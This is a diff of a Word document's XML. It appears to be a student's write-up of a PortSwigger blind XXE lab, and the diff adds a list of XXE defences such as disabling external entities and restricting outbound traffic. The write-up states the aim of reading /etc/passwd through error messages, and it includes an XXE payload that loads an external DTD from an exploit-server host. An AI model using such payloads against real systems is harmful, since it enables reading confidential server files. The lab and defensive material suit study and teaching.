--- a/PortSwigger Labs/Server Side Topics/XML External Entity Injection/Lab x - Exploiting blind XXE to retrieve data via error messages.docx
+++ b/PortSwigger Labs/Server Side Topics/XML External Entity Injection/Lab x - Exploiting blind XXE to retrieve data via error messages.docx
@@ -18,20 +18,30 @@
         <w:t xml:space="preserve">The application </w:t>
       </w:r>
       <w:r>
-        <w:t>has a "Check stock" feature that parses XML input but does not display the result.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> We will</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> use an external DTD to trigger an error message that displays the contents of the </w:t>
+        <w:t xml:space="preserve">has a "Check stock" feature that parses XML input but does not display the result. We will use an external DTD to trigger an error message that displays the contents of the </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>/etc/passwd</w:t>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>/passwd</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> file</w:t>
@@ -122,7 +132,27 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>Send a Check Stock request and intercept the POST request in BurpSuite’s Proxy tab.</w:t>
+        <w:t xml:space="preserve">Send a Check Stock request and intercept the POST request in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>BurpSuite’s</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Proxy tab.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -194,7 +224,27 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>Replace the XML body of the request in BurpSuite’s Repeater with the Payload</w:t>
+        <w:t xml:space="preserve">Replace the XML body of the request in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>BurpSuite’s</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Repeater with the Payload</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -423,7 +473,47 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>&lt;!DOCTYPE foo [&lt;!ENTITY % xxe SYSTEM "https://exploit-0abc001c0301917081e1d95d01420023.exploit-server.net/exploit.dtd"&gt; %xxe;]&gt;</w:t>
+        <w:t xml:space="preserve">&lt;!DOCTYPE foo [&lt;!ENTITY % </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xxe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> SYSTEM "https://exploit-0abc001c0301917081e1d95d01420023.exploit-server.net/exploit.dtd"&gt; %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xxe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>;]&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -441,16 +531,363 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:jc w:val="center"/>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
-          <w:sz w:val="40"/>
-          <w:szCs w:val="40"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Disable External Entity Processing:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> The first and foremost measure to prevent XXE attacks is to configure your XML parser to not process </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>external entities. This can be accomplished through configuration settings specific to the library being used.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Reject Unnecessary Document Types:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> If your application does not need to process document types, ensure they're blocked.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Update XML Parsers:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Many modern XML parsers are configured to be secure against XXE attacks by default. Ensure your XML libraries and parsers are always up-to-date.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Use Less Complex Data Formats:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> If XML isn’t strictly necessary, consider using simpler formats like JSON, which don't have the capability of defining entities.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Whitelist Input:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Accept only known good input. If certain XML structures are expected, validate incoming XML against a schema (XSD).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Implement Content Filtering:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> If the application needs to accept XML input, ensure that you filter incoming XML documents to prevent any document type declarations.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Use Dependency Checkers:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> There are tools that will scan project dependencies for known vulnerabilities. If you're building a Java application, the OWASP Dependency-Check can identify libraries that have known XXE vulnerabilities.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Error Handling:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Do not reveal the internal information in error messages. Avoid stack traces that leak path or file information, and ensure exceptions return generic error messages.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Access Control:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Limit the privileges of the account that processes XML in case it's compromised. This will make it harder for an attacker to make the parser read critical system files.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Network Restrictions:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Restrict outbound traffic from the server, especially on ports that are not necessary. This helps in reducing the impact of certain out-of-band XXE attacks.</w:t>
+      </w:r>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
@@ -465,6 +902,95 @@
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="289C188D"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="40CA1B52"/>
+    <w:lvl w:ilvl="0" w:tplc="4009000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="4009000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="4009000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2E8D1C44"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="A8F2CEDA"/>
@@ -555,7 +1081,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="30684E4B"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="B87ABF3E"/>
@@ -645,9 +1171,12 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="484471290">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="2" w16cid:durableId="1210191738">
     <w:abstractNumId w:val="1"/>
   </w:num>
-  <w:num w:numId="2" w16cid:durableId="1210191738">
+  <w:num w:numId="3" w16cid:durableId="554776136">
     <w:abstractNumId w:val="0"/>
   </w:num>
 </w:numbering>
